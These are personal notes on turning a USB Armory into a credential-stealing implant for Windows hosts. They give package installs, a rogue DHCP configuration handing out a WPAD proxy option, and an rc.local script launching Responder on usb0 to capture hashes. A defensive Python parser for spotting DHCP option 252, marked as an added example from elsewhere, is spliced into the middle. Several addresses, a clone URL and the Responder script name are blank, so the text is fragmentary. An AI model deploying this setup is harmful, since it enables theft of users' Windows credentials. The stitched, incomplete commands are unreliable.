Stealing Windows Credentials with USB Armory

These are just notes from trying to accomplish the exploit in this post:

I didn't manage to accomplish it for now, but I kept these notes in case I ever need to try it again some time.

sudo apt-get update
sudo apt-get upgrade

Certificates and date

sudo apt-get install ca-certificates ssl-cert
sudo apt-get install ntp ntpdate


sudo apt-get install -y python git python-pip python-dev screen sqlite3
sudo -H pip install --upgrade pip
sudo -H pip install pycrypto


git clone

DHCP configuration

sudo cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.original

sudo vim /etc/dhcp/dhcpd.conf
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "domain.local";
option domain-name-servers;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet netmask {
  option routers;
  option local-proxy-config "";
}

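The `option local-proxy-config code 252 = text;` line above declares the WPAD option, which the server then hands out as a plain text value. As an added example (not code from the original post), the parser below walks the option field of a DHCP message and reports whether option 252 is present and what it carries, which is what a network monitor would check to spot a DHCP server pushing a proxy configuration it should not. The DHCP offer is constructed in `build_offer` for testing; `wpad.example` is a placeholder host, not a real one.

```python
"""Walk the DHCP option field and report option 252 (WPAD / local-proxy-config).

Added example; the DHCP offer built here is constructed for testing, not a capture.
"""
from typing import Dict, Optional

MAGIC_COOKIE = b"\x63\x82\x53\x63"  # marks the start of the options field
OPT_PAD = 0
OPT_END = 255
OPT_WPAD = 252  # "local-proxy-config" in the dhcpd.conf above


def parse_dhcp_options(payload: bytes) -> Dict[int, bytes]:
    """Return {code: raw_value} for every option after the magic cookie.

    Raises ValueError if the payload is not a DHCP message or an option is cut short.
    """
    # The fixed DHCP header is 236 bytes; the 4-byte cookie follows it.
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message (missing magic cookie)")
    options: Dict[int, bytes] = {}
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == OPT_PAD:          # single-byte padding, no length field
            i += 1
            continue
        if code == OPT_END:          # end marker, ignore anything after it
            break
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option %d" % code)
        options[code] = value
        i += 2 + length
    return options


def wpad_url(payload: bytes) -> Optional[str]:
    """Return the option 252 text if the message carries it, else None."""
    opts = parse_dhcp_options(payload)
    if OPT_WPAD not in opts:
        return None
    # Option 252 is a text option; some servers append a trailing NUL, drop it.
    return opts[OPT_WPAD].rstrip(b"\x00").decode("ascii", errors="replace")


def build_offer(wpad: Optional[bytes]) -> bytes:
    """Build a minimal constructed DHCP OFFER (zeroed header) for testing."""
    header = bytes(236)
    opts = bytes([53, 1, 2])                            # message type = OFFER
    opts += bytes([54, 4]) + bytes([192, 0, 2, 1])      # server id, documentation range
    if wpad is not None:
        opts += bytes([OPT_WPAD, len(wpad)]) + wpad     # the WPAD option from the config
    opts += bytes([OPT_END])
    return header + MAGIC_COOKIE + opts


if __name__ == "__main__":
    # Placeholder URL, constructed for the example.
    offer = build_offer(b"http://wpad.example/wpad.dat")
    print("option 252:", wpad_url(offer))
    print("option 252 on a plain offer:", wpad_url(build_offer(None)))
```

Run against a captured DHCP OFFER instead of `build_offer`, the check is the same: any non-empty option 252 value from a server that is not the expected one is worth an alert. An empty string (as the subnet block above sets) parses to `""`, so a monitor should treat "option present" and "option non-empty" as separate signals.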
sudo cp /etc/rc.local /etc/rc.local.original

sudo vim /etc/rc.local
#!/bin/sh -e

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

# Start DHCP server

# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'

exit 0

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log